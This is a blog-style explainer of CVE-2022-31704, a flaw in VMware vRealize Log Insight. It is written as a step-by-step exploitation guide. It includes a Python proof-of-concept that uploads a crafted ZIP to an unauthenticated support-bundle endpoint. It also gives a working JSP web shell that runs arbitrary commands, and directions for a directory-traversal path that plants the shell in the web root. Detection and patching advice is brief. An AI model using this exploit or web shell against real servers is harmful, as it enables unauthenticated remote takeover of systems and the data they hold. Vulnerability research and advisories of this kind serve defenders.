CVE CyberSecurity Database News

CVE-2022-31704 - Remote Code Execution in VMware vRealize Log Insight Explained

Poster -

In 2022, cybersecurity researchers discovered a critical vulnerability—CVE-2022-31704—in VMware vRealize Log Insight, now renamed Aria Operations for Logs. This post will break down how this "broken access control" flaw works, show you how an attacker could use it to take over servers, and link to essential references. We'll keep things simple, but with technical accuracy, and show code examples you won't find everywhere else.

What is CVE-2022-31704?

VMware vRealize Log Insight is used for collecting, analyzing, and managing log data in networks, especially in big IT environments. In June 2022, a bug was found—CVE-2022-31704—that let hackers upload code to protected files *without* needing an account. If they succeed, attackers can *control* the software and the server it's running on.

This is called a Broken Access Control vulnerability: the software failed to stop outsiders from accessing sensitive areas that only admins should touch.

* CVE Page:  
 NIST CVE-2022-31704  
* VMware Advisory:  
 VMSA-2023-0001

How Does the Attack Work?

Most web apps will block you from accessing admin-level features unless you're logged in. But with CVE-2022-31704, you can trick the server into letting you *write* (upload) files to any spot, including the folders used to run scripts!

That means anyone on the internet can run their code on your server.

This happens because of a problem with how Log Insight checks user permissions in the file upload functions.

Original Discovery & References

- Horizon3.ai original research & exploitation details
- GitHub Proof-of-Concept Exploit
- VMware’s Security Patch Announcement

Exploit Details: Step by Step

Let’s simplify how an attacker might exploit CVE-2022-31704.

1. Find the Vulnerable Endpoint

Log Insight exposes vulnerable endpoints such as /api/v1/diag/prepare-support-bundle and /api/v2/diag/telemetry/photon/support-bundle.

2. Abuse Broken Access Control

No authentication is needed; you POST a specially crafted ZIP file to the endpoint. Log Insight will unpack that ZIP anywhere you tell it.

3. Sprinkling The Payload

If you drop a web shell in a directory that the web server runs scripts from (for example, /usr/lib/loginsight/application/3rd_party/apache-tomcat/webapps/ROOT/), you can execute your code just by visiting its URL.

PoC (Proof-of-Concept) Python Script

Below is a simplified code snippet. Do not use this on servers you do not own!

import requests

# Target URL
target_url = "http://TARGET:9543/api/v2/diag/telemetry/photon/support-bundle";

# Prepare ZIP file with your malicious JSP web shell
files = {
    'file': open('exploit.zip', 'rb')
}

# Send ZIP to the vulnerable endpoint
r = requests.post(target_url, files=files, verify=False)
print("[+] Upload response:", r.status_code)

# After this, you can access the web shell:
# http://TARGET:9543/ui/resources/your-shell.jsp

Before running this, you’d build a ZIP file containing a malicious .jsp file, with a path in the ZIP that drops it into the web server folder.

Malicious JSP Example: shell.jsp

<% if ("secret".equals(request.getParameter("key"))) {
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
    int a = -1;
    while((a=in.read())!=-1) out.print((char)a);
} %>


Visiting /ui/resources/shell.jsp?key=secret&cmd=id would run the id command on the server.

Create exploit.zip

- Contains shell.jsp, stored as ../../ui/resources/shell.jsp (using directory traversal)

Who is Affected?

Any unpatched VMware vRealize Log Insight (8.8. and older). VMware released a patch; if you still use an old version, you are *at risk*.

Patch now:

Download latest fixed version

Detection

Look for unusual file uploads or requests to the endpoints named above. Monitor for unexpected JSP files in webapps directories, as well as strange commands in server logs.

Protect Yourself

- Update Log Insight/Aria Operations for Logs immediately.

Final Notes

CVE-2022-31704 is a typical example of the worst kind of web app mistake: letting anyone modify files meant only for trusted admins. If you're running any VMware appliances, make sure they’re up-to-date, and always restrict who can access them—especially over the internet.

References for further reading

- NIST CVE summary
- Horizon3.ai Technical Analysis
- VMware Advisory


*Stay safe. Patch your software, and keep learning!*

Timeline

Published on: 01/26/2023 21:15:00 UTC
Last modified on: 02/01/2023 16:57:00 UTC